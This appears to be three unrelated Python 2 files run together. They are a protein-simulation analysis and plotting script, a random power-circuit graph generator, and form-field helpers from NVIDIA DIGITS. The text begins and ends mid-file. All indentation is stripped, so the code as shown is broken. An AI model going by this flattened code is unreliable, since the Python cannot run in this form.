process_after_perturb_rmsd, process_energy_differences, get_mode_frequencies
from imghdr import what
def remove_energy_outlayers(all_data, ENERGY_LABEL):
outlayer_margin = int(len(all_data[ENERGY_LABEL])*0.98)
ener_low = min(sorted(all_data[ENERGY_LABEL], reverse = True)[:outlayer_margin])
ener_high = max(sorted(all_data[ENERGY_LABEL])[:outlayer_margin])
indices = numpy.logical_and(all_data[ENERGY_LABEL] < ener_high,
all_data[ENERGY_LABEL] > ener_low)
for label in all_data:
print label , "initial len ", len(all_data[label]),
all_data[label] = numpy.array(all_data[label])
all_data[label] = all_data[label][indices]
print "final len ", len(all_data[label])
return ener_low, ener_high
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("--experiment", dest="experiment")
parser.add_option("--results", dest="results_folder")
parser.add_option("--workspace", dest="workspace")
parser.add_option("--folder", default= "info" ,dest="folder")
parser.add_option("--plot", action = "store_true", default= False, dest="do_plots")
(options, args) = parser.parse_args()
if not options.experiment:
parser.error('Experiment file not given')
if not options.results_folder:
parser.error('Results folder not given')
experiment_details = load_control_json(options.experiment)
if options.workspace is not None:
workspace = os.path.normpath(options.workspace)
else:
workspace = os.path.normpath(experiment_details["workspace"])
# Create a place for the results
create_directory(os.path.join(options.results_folder, os.path.basename(workspace)))
# Initialize stuff
all_data = defaultdict(list)
relax_iterations = []
acceptances = defaultdict(lambda: defaultdict(list))
avg_energy = defaultdict(list)
std_energy = defaultdict(list)
avg_rmsd = defaultdict(list)
avg_time = defaultdict(list)
norm_rmsd = defaultdict(list)
norm_energy = defaultdict(list)
mode_frequencies = defaultdict(list)
modes_p_v = defaultdict(list)
ENERGY_LABEL = "$\Delta$ U"
RMSD_LABEL = "RMSD"
nmd_file_name = {"CC":"normalized_modes.1.nmd",
"IC":"normalized_modes_cc.1.nmd"}
v1s = []
v2s = []
for (p1,v1),(p2,v2) in pair_parameter_values(experiment_details["check"], experiment_details["parameter_values"]):
v1s.append(v1)
v2s.append(v2)
folder_name = "%s_%s_%s_%s_%s"%(experiment_details["prefix"],
experiment_details["parameter_abbv"][p1], parameter_value_to_string(v1),
experiment_details["parameter_abbv"][p2], parameter_value_to_string(v2))
if experiment_details["prefix"] == "CC":
raw_data, data_len = load_cc_data(os.path.join(workspace,
folder_name,
options.folder),
full_pele_energy = False,
skip_first = 15)
if experiment_details["prefix"] == "IC":
raw_data, data_len = load_ic_data(os.path.join(workspace,
folder_name,
options.folder),
skip_first = 15)
# Start processing
modes = raw_data["modes"]
_mode_frequencies = get_mode_frequencies(modes,
os.path.join(workspace, folder_name, "info",
nmd_file_name[experiment_details["prefix"]])
)
energy_increments = process_energy_differences(raw_data)
rmsd_increments = process_after_perturb_rmsd(raw_data)
acc_mean_and_avg = MetropolisMCSimulator(energy_increments).perform_simulation(
min(100,len(energy_increments)), 20, 300)
# Fill all data structure
all_data[ENERGY_LABEL].extend(energy_increments)
all_data[RMSD_LABEL].extend(rmsd_increments)
all_data["Mode"].extend(modes)
all_data["time_per_step"].extend(raw_data["time_per_step"])
all_data[p1].extend([v1]*data_len)
all_data[p2].extend([v2]*data_len)
# Fill the other structures
acceptances[v1,v2] = acc_mean_and_avg
avg_rmsd[v1,v2] = (numpy.mean(rmsd_increments),
numpy.std(rmsd_increments))
avg_energy[v1,v2] = numpy.mean(energy_increments)
std_energy[v1,v2] = numpy.std(energy_increments)
print std_energy[v1,v2]
avg_time[v1,v2] = (numpy.mean(raw_data["time_per_step"]),
numpy.std(raw_data["time_per_step"]))
norm_rmsd[v1,v2] = numpy.array(rmsd_increments) / numpy.max(rmsd_increments)
norm_energy[v1,v2] = numpy.array(energy_increments) / numpy.max(numpy.abs(energy_increments))
modes_p_v[v1,v2] = numpy.array(modes)+1 # Modes will start from index 1 in the plots
mode_frequencies[v1,v2] = _mode_frequencies
v1s = sorted(list(set(v1s)))
v2s = sorted(list(set(v2s)))
# Remove outliers
energy_with_outlayers = numpy.array(all_data[ENERGY_LABEL])
ener_low, ener_high = remove_energy_outlayers(all_data, ENERGY_LABEL)
# Save all_data in pickled format
pickle.dump(all_data, open(os.path.join(options.results_folder,os.path.basename(workspace),"all_data.pickle"),"w"))
db = DataFrame.from_dict(all_data, orient="index")
db.transpose().to_csv(os.path.join(options.results_folder,os.path.basename(workspace),"data.csv"))
db.columns = db.columns.get_level_values(0)
if options.do_plots:
import seaborn as sns
sns.set_style("whitegrid")
# Facet grid to see rmsd vs energy vs dispfactor vs relaxation whatever
g = sns.FacetGrid(db.transpose(), col=p1, row=p2, hue="Mode",
sharex = True, sharey = True, margin_titles=True,
legend_out = True, ylim= (ener_low, ener_high))
g.map(plt.scatter, RMSD_LABEL, ENERGY_LABEL)
g.add_legend(label_order = sorted(g._legend_data.keys()))
g.fig.suptitle("RMSD - $\Delta U$ - displacement - relaxation intensity (colored by mode)")
g.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_u_rmsd.svg"))
plt.close()
# Global rmsd vs time, color by dispfact and relax
colors = sns.color_palette("hls", len( set(all_data[p1])))
ax = plt.subplot2grid((2,2), (0,0))
scatter_plot_by_hue(all_data[RMSD_LABEL], all_data["time_per_step"], all_data[p1], colors)
ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05))
ax.set_ylabel("Tps (s) (hue=%s)"%p1)
ax = plt.subplot2grid((2,2), (1,0))
scatter_plot_by_hue(all_data[RMSD_LABEL], all_data["time_per_step"], all_data[p2], colors)
ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05))
ax.set_ylabel("Tps (s) (hue=%s)"%p2)
ax.set_xlabel("RMSD")
# Global energy vs time, color by dispfact and relax
ax = plt.subplot2grid((2,2), (0,1))
scatter_plot_by_hue(all_data[ENERGY_LABEL], all_data["time_per_step"], all_data[p1], colors)
ax = plt.subplot2grid((2,2), (1,1))
scatter_plot_by_hue(all_data[ENERGY_LABEL], all_data["time_per_step"], all_data[p2], colors)
ax.set_xlabel("Energy" )
plt.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_vs_timespep.svg"))
plt.close()
# Define categories for acceptance
# from 100% to 35%, yellow, high
# from 35% to 25%, green, good acceptance
# from 0 to 25%, red, bad acceptance
cat_acceptances = {}
for key in acceptances:
acceptance = acceptances[key][0]
if acceptance <= 1. and acceptance > 0.35:
cat_acceptances[key] = "high"
elif acceptance <= 0.35 and acceptance > 0.25:
cat_acceptances[key] = "good"
else:
cat_acceptances[key] = "low"
# rmsd vs time and color by acceptance
plt.figure()
keys = sorted(avg_rmsd.keys())
labels = []
colors = {"high": "yellow","good":"green" ,"low":"red"}
for acc_cat in ["high","good","low"]:
x = []
y = []
for x_k in avg_rmsd:
if cat_acceptances[x_k] == acc_cat:
x.append(avg_rmsd[x_k][0])
y.append(avg_time[x_k][0])
plt.scatter(x, y, label = acc_cat, color = colors[acc_cat])
#plt.errorbar(x, y, xerr=avg_rmsd[key][1], yerr=acceptances[key][1], fmt='o')
plt.title("Avg. RMSD vs Avg. Time per Step")
plt.xlabel("Avg. RMSD (${\AA}$)")
plt.ylabel("Avg. Time per Step (s)")
plt.legend()
plt.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_rmsd_vs_tps_hue_acc.svg"))
plt.close()
# inc_U vs time and color by acceptance
plt.figure()
keys = sorted(avg_rmsd.keys())
labels = []
colors = {"high": "yellow","good":"green" ,"low":"red"}
for acc_cat in ["high","good","low"]:
x = []
y = []
for x_k in avg_rmsd:
if cat_acceptances[x_k] == acc_cat:
x.append(avg_energy[x_k])
y.append(avg_time[x_k][0])
plt.scatter(x, y, label = acc_cat, color = colors[acc_cat])
#plt.errorbar(x, y, xerr=avg_rmsd[key][1], yerr=acceptances[key][1], fmt='o')
plt.title("Avg. $\Delta U$ vs Time per Step (hue=acceptance)")
plt.xlabel("Avg. $\Delta U$ (kcal/mol) ")
plt.ylabel("Avg. Time per Step (s)")
plt.legend()
plt.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_energy_vs_tps_hue_acc.svg"))
plt.close()
# Do rmsd/energy vs acceptance
plt.figure()
keys = sorted(avg_rmsd.keys())
labels = []
colors = sns.color_palette("hls", len(keys))
for i, key in enumerate(keys):
x = avg_rmsd[key][0] / avg_energy[key]
y = acceptances[key][0]
label = "%.2f %.2f"%key
plt.scatter(x, y, label = label, color = colors[i])
#plt.errorbar(x, y, xerr=avg_rmsd[key][1], yerr=acceptances[key][1], fmt='o')
plt.annotate(
label,
xy = (x, y), xytext = (5, 5),
textcoords = 'offset points', ha = 'right', va = 'bottom', size=6)
plt.xlabel("RMSD / energy")
plt.ylabel("Acceptance")
plt.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_rmsd_energy_vs_acc.svg"))
plt.close()
# Do rmsd vs acceptance
plt.figure()
keys = sorted(avg_rmsd.keys())
labels = []
colors = sns.color_palette("hls", len(keys))
for i, key in enumerate(keys):
x = avg_rmsd[key][0]
y = acceptances[key][0]
label = "%.2f %.2f"%key
plt.scatter(x, y, label = label, color = colors[i])
plt.errorbar(x, y, xerr = avg_rmsd[key][1], yerr=acceptances[key][1], fmt='o')
plt.annotate(
label,
xy = (x, y), xytext = (5, 5),
textcoords = 'offset points', ha = 'right', va = 'bottom', size=6)
plt.xlabel("RMSD")
plt.ylabel("Acceptance")
plt.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_rmsd_vs_acc.svg"))
plt.close()
# Do energy vs acceptance
plt.figure()
keys = sorted(avg_rmsd.keys())
labels = []
colors = sns.color_palette("hls", len(keys))
for i, key in enumerate(keys):
x = avg_energy[key]
y = acceptances[key][0]
label = "%.2f %.2f"%key
plt.errorbar(x, y, xerr = std_energy[key], yerr=acceptances[key][1], color = colors[i])
plt.scatter(x, y, label = label, color = colors[i])
plt.annotate(
label,
xy = (x, y), xytext = (5, 5),
textcoords = 'offset points', ha = 'right', va = 'bottom', size=6)
plt.xlabel("Energy")
plt.ylabel("Acceptance")
plt.savefig(os.path.join(options.results_folder,os.path.basename(workspace),os.path.basename(workspace)+"_energy_vs_acc.svg"))
plt.close()
# Do energy vs rmsd
plt.figure()
keys = sorted(avg_rmsd.keys())
labels = []
colors = sns.color_palette("hls", len(keys))
markers = ["o", "s", "h", "*", "+", "D"]
colors = sns.color_palette("hls", len(v1s))
for i, v1 in enumerate(v1s):
for j,v2 in enumerate(v2s):
key = (v1,v2)
x = avg_rmsd[key][0]
x_err = avg_rmsd[key][1]
y = avg_energy[key]
y_err = std_energy[key]
label = "%.2f %.2f"%key
plt.errorbar(x, y,
xerr=x_err, yerr=y_err,
marker=markers[j],
color=colors[i],
label = label, mec='black',mew=1)
plt.scatter(x, y, marker=markers[j], linewidths=1, edgecolors='black', color=colors[i])
plt.xlabel("RMSD")
plt.ylabel("$\Delta U$")
plt.legend()
plt.savefig(os.path.join(options.results_folder,
os.path.basename(workspace),
os.path.basename(workspace)+"_rmsd_vs_energy_avgs.svg"))
plt.close()
other_results = open(os.path.join(options.results_folder,
os.path.basename(workspace),"other_results.txt"),"w")
def save_result(what):
print what
other_results.write(what+"\n")
#---------------------------------------
# Energy vs RMSD correlation
#---------------------------------------
ranked_rmsd = scipy.stats.rankdata(numpy.array(all_data[RMSD_LABEL]))
ranked_energy = scipy.stats.rankdata(numpy.array(all_data[ENERGY_LABEL]))
min_rank = min(numpy.max(ranked_rmsd),numpy.max(ranked_energy))
if min_rank == numpy.min(ranked_rmsd):
ranked_energy *= min_rank /numpy.max(ranked_energy)
else:
ranked_rmsd *= min_rank /numpy.max(ranked_rmsd)
rho, p_val = scipy.stats.spearmanr(ranked_rmsd, ranked_energy)
save_result( "Does the RMSD and energy inc. correlate?\t%.2f\t%.2f"%(rho,p_val))
#---------------------------------------
# Displacement (normalized) vs Frequency
#---------------------------------------
all_freqs = []
for key in mode_frequencies: all_freqs.extend(mode_frequencies[key])
all_norm_rmsd = []
for key in norm_rmsd: all_norm_rmsd.extend(norm_rmsd[key])
all_modes = []
for key in modes_p_v: all_modes.extend(modes_p_v[key])
# X is the independent var. In this case a discrete (or even categorical) one.
# Y is the dependent var, is continuous.
# sns.regplot(numpy.array(all_freqs), numpy.array(all_norm_rmsd))
# plt.show()
# We can use spearman rank (rho, symmetric) to check the "association force" or correlation
# For this it is needed to convert both to categorical ranked variables.
# frequencies is already a ranked categorical variable (is it discretized? It may be not
# because we do not have, and it is not possible to have, values in the full range)
ranked_norm_rmsd = scipy.stats.rankdata(all_norm_rmsd)
# rescale in 1-10 like modes
scaled_ranked_norm_rmsd = ranked_norm_rmsd*10./numpy.max(ranked_norm_rmsd)
rho, p_val = scipy.stats.spearmanr(scaled_ranked_norm_rmsd, all_modes)
# The smaller the p-value is, the better (evidence agains the hypothesis that variables are uncorrelated)
#save_result( "Does the (ANM) norm. RMSD depend on the frequency of the mode?\t %.3f\t (%.3f)"%(rho,p_val))
#--------------------------------------------
# Energy increment (normalized) vs Frequency
#--------------------------------------------
all_norm_energies = []
for key in norm_energy: all_norm_energies.extend(norm_energy[key])
sns.regplot(numpy.array(all_freqs), numpy.array(all_norm_energies))
# plt.show()
ranked_norm_energies = scipy.stats.rankdata(all_norm_energies)
scaled_ranked_norm_energies = ranked_norm_energies*10./numpy.max(ranked_norm_energies)
rho, p_val = scipy.stats.spearmanr(ranked_norm_energies, all_modes)
#save_result( "Does the (ANM) norm. energy increment depend on the frequency of the mode?\t %.3f\t (%.3f)"%(rho,p_val))
#-----------------------------------------------------------
# Time per step (cont. dep.) and p1, p2 (cat. ranked ind.)
#-----------------------------------------------------------
# rank them
for p in [p1,p2]:
ranked_time = scipy.stats.rankdata(numpy.array(all_data["time_per_step"]).astype(float))
ranked_p = scipy.stats.rankdata(numpy.array(all_data[p]))
# norm range of time to range of p
ranked_time *= numpy.max(ranked_p)/numpy.max(ranked_time)
rho, p_val = scipy.stats.spearmanr(ranked_time, ranked_p)
save_result( "Does the time per (ANM) step depend on %s?\t%.3f\t%.3f"%(p,rho,p_val))
#-----------------------------------------------------------
# RMSD (cont. dep.) and p1, p2 (cat. ranked ind.)
#-----------------------------------------------------------
#in this case rmsd is not normed
for p in [p1,p2]:
ranked_p = scipy.stats.rankdata(numpy.array(all_data[p]))
ranked_rmsd = scipy.stats.rankdata(numpy.array(all_data[RMSD_LABEL]))
scaled_ranked_rmsd = ranked_rmsd*numpy.max(ranked_p)/numpy.max(ranked_rmsd)
rho, p_val = scipy.stats.spearmanr(scaled_ranked_rmsd, ranked_p)
save_result( "Does the (ANM) RMSD depend on %s?\t%.3f\t%.3f"%(p,rho,p_val))
#-----------------------------------------------------------
# Energy increment (cont. dep.) and p1, p2 (cat. ranked ind.)
#-----------------------------------------------------------
for p in [p1,p2]:
ranked_p = scipy.stats.rankdata(numpy.array(all_data[p]))
ranked_energies = scipy.stats.rankdata(numpy.array(all_data[ENERGY_LABEL]))
scaled_ranked_energies = ranked_energies*numpy.max(ranked_p)/numpy.max(ranked_energies)
rho, p_val = scipy.stats.spearmanr(scaled_ranked_energies, ranked_p)
save_result( "Does the (ANM) Energy increment depend on %s?\t%.3f\t%.3f"%(p,rho,p_val))
# Energy absolute values
smaller_than_0 = []
bigger_than_0 = []
for energy in energy_with_outlayers:
if energy <= 0:
smaller_than_0.append(energy)
else:
bigger_than_0.append(energy)
save_result( "[Energy] Number of <0: %.2f Mean of > 0: %.2f (%.2f)"%(100*float(len(smaller_than_0)) /len(all_data[ENERGY_LABEL]),
numpy.mean(bigger_than_0), numpy.std(bigger_than_0)))
save_result( "Avg. time per step %.2f (%.2f)"%(numpy.mean(all_data["time_per_step"]), numpy.std(all_data["time_per_step"])))
other_results.close()
| |
import time
import math
import random
from specs import *
# generate a random circuit
# The circuit created has contraints including:
# Only TRUs and sensors can have a wire connected to other components; others must have a contactor
# Generators cannot connect with other generators with a contactor
# Number of edges connected to generators or sensors or TRUs must be 1 or 2
# Number of edges connected to buses can be any integer larger than 0
# The inport of TRU must have a live path with the DC buses
# The outport of TRU must have a live path with the AC buses
# Generators are in the AC part
def generate_random_circuit(num_comp, ratio_sensor_comp):
num_sensor = int(math.ceil(num_comp * ratio_sensor_comp))
num_generator = random.randint(1, num_comp - 1)
num_TRU = num_comp - num_generator
num_bus = num_comp
num_DC_bus = random.randint(1, num_bus - 1)
num_AC_bus = num_bus - num_DC_bus
DC_part = []
AC_part = []
generators = []
G = nx.DiGraph()
num = 1 # Set the initial number of nodes
# Create nodes and assign AC and DC part
for i in range(0, num_sensor):
G.add_node(str(num), name = 'S' + str(i+1), type = 'sensor')
if random.randint(0, 1) == 0:
AC_part.append(str(num))
else:
DC_part.append(str(num))
num = num + 1
for i in range(0, num_generator):
G.add_node(str(num), name = 'G' + str(i+1), type = 'generator')
generators.append(str(num))
num = num + 1
for i in range(0, num_TRU):
G.add_node(str(num), name = 'T' + str(i+1) + '_dc', type = 'rectifier_dc')
G.add_node(str(num) + '_ac', name = 'T' + str(i+1) + '_ac', type = 'rectifier_ac')
G.add_edge(str(num) + '_ac', str(num), type = 'wire')
AC_part.append(str(num) + '_ac')
DC_part.append(str(num))
num = num + 1
for i in range(0, num_DC_bus):
G.add_node(str(num), name = 'B' + str(i+1), type = 'bus')
DC_part.append(str(num))
num = num + 1
for i in range(num_DC_bus, num_AC_bus + num_DC_bus):
G.add_node(str(num), name = 'B' + str(i+1), type = 'bus')
AC_part.append(str(num))
num = num + 1
# Create edges between generators and AC components
num_cont = 1
for i in generators:
num_neighbors = random.randint(1, 2)
if num_neighbors == 2 and len(AC_part) == 1:
num_neighbors = 1
neighbors = random.sample(AC_part, num_neighbors)
for j in neighbors:
if G.node[j]['type'] == 'bus':
G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
num_cont = num_cont + 1
else:
edge_type = random.choice(['wire', 'contactor'])
if edge_type == 'contactor':
G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
num_cont = num_cont + 1
else:
G.add_edges_from([(i, j), (j, i)], type = 'wire')
if G.node[j]['type'] == 'rectifier_ac':
AC_part.remove(j)
else:
if len(G.neighbors(j)) > 1:
AC_part.remove(j)
# Create other AC edges
# len_AC = len(AC_part)
# for k in range(0, len_AC - num_AC_bus):
while len(AC_part) > num_AC_bus:
i = AC_part[0]
AC_part.remove(i)
if G.node[i]['type'] == 'rectifier_ac':
j = random.choice(AC_part)
edge_type = random.choice(['wire', 'contactor'])
if edge_type == 'contactor':
G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
num_cont = num_cont + 1
else:
G.add_edges_from([(i, j), (j, i)], type = 'wire')
if G.node[j]['type'] == 'rectifier_ac':
AC_part.remove(j)
else:
if len(G.neighbors(j)) > 1 and G.node[j]['type'] != 'bus':
AC_part.remove(j)
else:
if G.node[i]['type'] == 'sensor':
num_neighbors = random.randint(1, 2) - len(G.neighbors(i))
if num_neighbors > 0:
if num_neighbors == 2 and len(AC_part) == 1:
num_neighbors = 1
neighbors = random.sample(AC_part, num_neighbors)
for j in neighbors:
edge_type = random.choice(['wire', 'contactor'])
if edge_type == 'contactor':
G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
num_cont = num_cont + 1
else:
G.add_edges_from([(i, j), (j, i)], type = 'wire')
if G.node[j]['type'] == 'rectifier_ac':
AC_part.remove(j)
else:
if len(G.neighbors(j)) > 1 and G.node[j]['type'] != 'bus':
AC_part.remove(j)
# Create edges between AC buses
candidates = copy.copy(AC_part)
for k in range(0, len(AC_part) - 1):
i = candidates[0]
candidates.remove(candidates[0])
num_neighbors = random.randint(0, len(candidates))
neighbors = random.sample(candidates, num_neighbors)
for j in neighbors:
G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
num_cont = num_cont + 1
# Create DC edges
while len(DC_part) > num_DC_bus:
i = DC_part[0]
DC_part.remove(i)
if G.node[i]['type'] == 'rectifier_dc':
j = random.choice(DC_part)
edge_type = random.choice(['wire', 'contactor'])
if edge_type == 'contactor':
G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
num_cont = num_cont + 1
else:
G.add_edges_from([(i, j), (j, i)], type = 'wire')
if G.node[j]['type'] == 'rectifier_dc':
DC_part.remove(j)
else:
if len(G.neighbors(j)) > 1 and G.node[j]['type'] != 'bus':
DC_part.remove(j)
else:
if G.node[i]['type'] == 'sensor':
num_neighbors = random.randint(1, 2) - len(G.neighbors(i))
if num_neighbors > 0:
if num_neighbors == 2 and len(DC_part) == 1:
num_neighbors = 1
neighbors = random.sample(DC_part, num_neighbors)
for j in neighbors:
edge_type = random.choice(['wire', 'contactor'])
if edge_type == 'contactor':
G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
num_cont = num_cont + 1
else:
G.add_edges_from([(i, j), (j, i)], type = 'wire')
if G.node[j]['type'] == 'rectifier_dc':
DC_part.remove(j)
else:
if len(G.neighbors(j)) > 1 and G.node[j]['type'] != 'bus':
DC_part.remove(j)
# Create edges between DC buses
candidates = copy.copy(DC_part)
for k in range(0, len(DC_part) - 1):
i = candidates[0]
candidates.remove(candidates[0])
num_neighbors = random.randint(0, len(candidates))
neighbors = random.sample(candidates, num_neighbors)
for j in neighbors:
G.add_edges_from([(i, j), (j, i)], name = 'C' + str(num_cont), type = 'contactor')
num_cont = num_cont + 1
return G
# generate random controllable contactor list
def generate_random_cc(G, ratio_cc):
name_data = nx.get_edge_attributes(G, 'name').values()
all_contactors = []
for i in name_data:
if all_contactors.count(i) == 0:
all_contactors.append(i)
num_cc = int(math.floor(float(len(all_contactors)) * ratio_cc))
con_conts = random.sample(all_contactors, num_cc)
return con_conts
# generate random dict with value 0 or 1
def generate_dict(a_list):
a_dict = {}
for i in a_list:
a_dict[i] = random.randint(0, 1)
return a_dict
# verify whether the results are the same
def verifier(a, b):
if a != b:
print 'Error: two results are not the same!'
exit()
return 0
| |
# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved.
from __future__ import absolute_import
from werkzeug.datastructures import FileStorage
import wtforms
from wtforms import SubmitField
from wtforms import validators
from digits.utils.routing import get_request_arg
def validate_required_iff(**kwargs):
"""
Used as a validator within a wtforms.Form
This implements a conditional DataRequired
Each of the kwargs is a condition that must be met in the form
Otherwise, no validation is done
"""
def _validator(form, field):
all_conditions_met = True
for key, value in kwargs.iteritems():
if getattr(form, key).data != value:
all_conditions_met = False
if all_conditions_met:
# Verify that data exists
if field.data is None \
or (isinstance(field.data, (str, unicode))
and not field.data.strip()) \
or (isinstance(field.data, FileStorage)
and not field.data.filename.strip()):
raise validators.ValidationError('This field is required.')
else:
# This field is not required, ignore other errors
field.errors[:] = []
raise validators.StopValidation()
return _validator
def validate_greater_than(fieldname):
"""
Compares the value of two fields the value of self is to be greater than the supplied field.
:param fieldname:
The name of the other field to compare to.
"""
def _validator(form, field):
try:
other = form[fieldname]
except KeyError:
raise validators.ValidationError(field.gettext(u"Invalid field name '%s'.") % fieldname)
if field.data != '' and field.data < other.data:
message = field.gettext(u'Field must be greater than %s.' % fieldname)
raise validators.ValidationError(message)
return _validator
class Tooltip(object):
"""
An HTML form tooltip.
"""
def __init__(self, field_id, for_name, text):
self.field_id = field_id
self.text = text
self.for_name = for_name
def __str__(self):
return self()
def __unicode__(self):
return self()
def __html__(self):
return self()
def __call__(self, text=None, **kwargs):
if 'for_' in kwargs:
kwargs['for'] = kwargs.pop('for_')
else:
kwargs.setdefault('for', self.field_id)
return wtforms.widgets.HTMLString(
('<span name="%s_explanation"'
' class="explanation-tooltip glyphicon glyphicon-question-sign"'
' data-container="body"'
' title="%s"'
' ></span>') % (self.for_name, self.text))
def __repr__(self):
return 'Tooltip(%r, %r, %r)' % (self.field_id, self.for_name, self.text)
class Explanation(object):
"""
An HTML form explanation.
"""
def __init__(self, field_id, for_name, filename):
self.field_id = field_id
self.file = filename
self.for_name = for_name
def __str__(self):
return self()
def __unicode__(self):
return self()
def __html__(self):
return self()
def __call__(self, file=None, **kwargs):
if 'for_' in kwargs:
kwargs['for'] = kwargs.pop('for_')
else:
kwargs.setdefault('for', self.field_id)
import flask
from digits.webapp import app
html = ''
# get the text from the html file
with app.app_context():
html = flask.render_template(file if file else self.file)
if len(html) == 0: return ''
return wtforms.widgets.HTMLString(
('<div id="%s_explanation" style="display:none;">\n'
'%s'
'</div>\n'
'<a href=# onClick="bootbox.alert($(\'#%s_explanation\').html()); return false;"><span class="glyphicon glyphicon-question-sign"></span></a>\n'
) % (self.for_name, html, self.for_name))
def __repr__(self):
return 'Explanation(%r, %r, %r)' % (self.field_id, self.for_name, self.file)
class IntegerField(wtforms.IntegerField):
def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
super(IntegerField, self).__init__(label, validators, **kwargs)
self.tooltip = Tooltip(self.id, self.short_name, tooltip)
self.explanation = Explanation(self.id, self.short_name, explanation_file)
class FloatField(wtforms.FloatField):
def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
super(FloatField, self).__init__(label, validators, **kwargs)
self.tooltip = Tooltip(self.id, self.short_name, tooltip)
self.explanation = Explanation(self.id, self.short_name, explanation_file)
class SelectField(wtforms.SelectField):
def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
super(SelectField, self).__init__(label, validators, **kwargs)
self.tooltip = Tooltip(self.id, self.short_name, tooltip)
self.explanation = Explanation(self.id, self.short_name, explanation_file)
class SelectMultipleField(wtforms.SelectMultipleField):
def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
super(SelectMultipleField, self).__init__(label, validators, **kwargs)
self.tooltip = Tooltip(self.id, self.short_name, tooltip)
self.explanation = Explanation(self.id, self.short_name, explanation_file)
class TextField(wtforms.TextField):
def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
super(TextField, self).__init__(label, validators, **kwargs)
self.tooltip = Tooltip(self.id, self.short_name, tooltip)
self.explanation = Explanation(self.id, self.short_name, explanation_file)
class StringField(wtforms.StringField):
def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
super(StringField, self).__init__(label, validators, **kwargs)
self.tooltip = Tooltip(self.id, self.short_name, tooltip)
self.explanation = Explanation(self.id, self.short_name, explanation_file)
class FileInput(object):
"""
Renders a file input chooser field.
"""
def __call__(self, field, **kwargs):
kwargs.setdefault('id', field.id)
return wtforms.widgets.HTMLString(
('<div class="input-group">' +
' <span class="input-group-btn">' +
' <span class="btn btn-info btn-file" %s>' +
' Browse…' +
' <input %s>' +
' </span>' +
' </span>' +
' <input class="form-control" %s readonly>' +
'</div>') % (wtforms.widgets.html_params(id=field.name + '_btn', name=field.name + '_btn'),
wtforms.widgets.html_params(name=field.name, type='file', **kwargs),
wtforms.widgets.html_params(id=field.id + '_text', name=field.name + '_text', type='text')))
class FileField(wtforms.FileField):
# Comment out the following line to use the native file input
widget = FileInput()
def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
super(FileField, self).__init__(label, validators, **kwargs)
self.tooltip = Tooltip(self.id, self.short_name, tooltip)
self.explanation = Explanation(self.id, self.short_name, explanation_file)
class TextAreaField(wtforms.TextAreaField):
def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
super(TextAreaField, self).__init__(label, validators, **kwargs)
self.tooltip = Tooltip(self.id, self.short_name, tooltip)
self.explanation = Explanation(self.id, self.short_name, explanation_file)
class BooleanField(wtforms.BooleanField):
def __init__(self, label='', validators=None, tooltip='', explanation_file = '', **kwargs):
super(BooleanField, self).__init__(label, validators, **kwargs)
self.tooltip = Tooltip(self.id, self.short_name, tooltip)
self.explanation = Explanation(self.id, self.short_name, explanation_file)
## Used to save data to populate forms when cloning
def add_warning(form, warning):
if not hasattr(form, 'warnings'):
form.warnings = tuple([])
form.warnings += tuple([warning])
return True
## Iterate over the form looking for field data to either save to or
## get from the job depending on function.
def iterate_over_form(job, form, function, prefix = ['form'], indent = ''):
warnings = False
if not hasattr(form, '__dict__'): return False
# This is the list of Field types to save. SubmitField and
# FileField is excluded. SubmitField would cause it to post and
# FileField can not be populated.
whitelist_fields = [
'BooleanField', 'FloatField', 'HiddenField', 'IntegerField',
'RadioField', 'SelectField', 'SelectMultipleField',
'StringField', 'TextAreaField', 'TextField']
blacklist_fields = ['FileField', 'SubmitField']
for attr_name in vars(form):
if attr_name == 'csrf_token' or attr_name == 'flags':
continue
attr = getattr(form, attr_name)
if isinstance(attr, object):
if isinstance(attr, SubmitField): continue
warnings |= iterate_over_form(job, attr, function, prefix + [attr_name], indent + ' ')
if hasattr(attr, 'data') and hasattr(attr, 'type'):
if (isinstance(attr.data, int) or
isinstance(attr.data, float) or
isinstance(attr.data, basestring) or
attr.type in whitelist_fields):
key = '%s.%s.data' % ('.'.join(prefix), attr_name)
warnings |= function(job, attr, key, attr.data)
# Warn if certain field types are not cloned
if (len(attr.type) > 5 and attr.type[-5:] == 'Field' and
attr.type not in whitelist_fields and
attr.type not in blacklist_fields):
warnings |= add_warning(attr, 'Field type, %s, not cloned' % attr.type)
return warnings
## function to pass to iterate_over_form to save data to job
def set_data(job, form, key, value):
if not hasattr(job, 'form_data'): job.form_data = dict()
job.form_data[key] = value
if isinstance(value, basestring):
value = '\'' + value + '\''
# print '\'' + key + '\': ' + str(value) +','
return False
## function to pass to iterate_over_form to get data from job
def get_data(job, form, key, value):
if key not in job.form_data:
add_warning(form, 'Unable to recover data form source Job.')
return True
else:
form.data = job.form_data[key]
return False
## Save to form field data in form to the job so the form can later be
## populated with the sae settings during a clone event.
def save_form_to_job(job, form):
iterate_over_form(job, form, set_data)
## Populate the form with form field data saved in the job
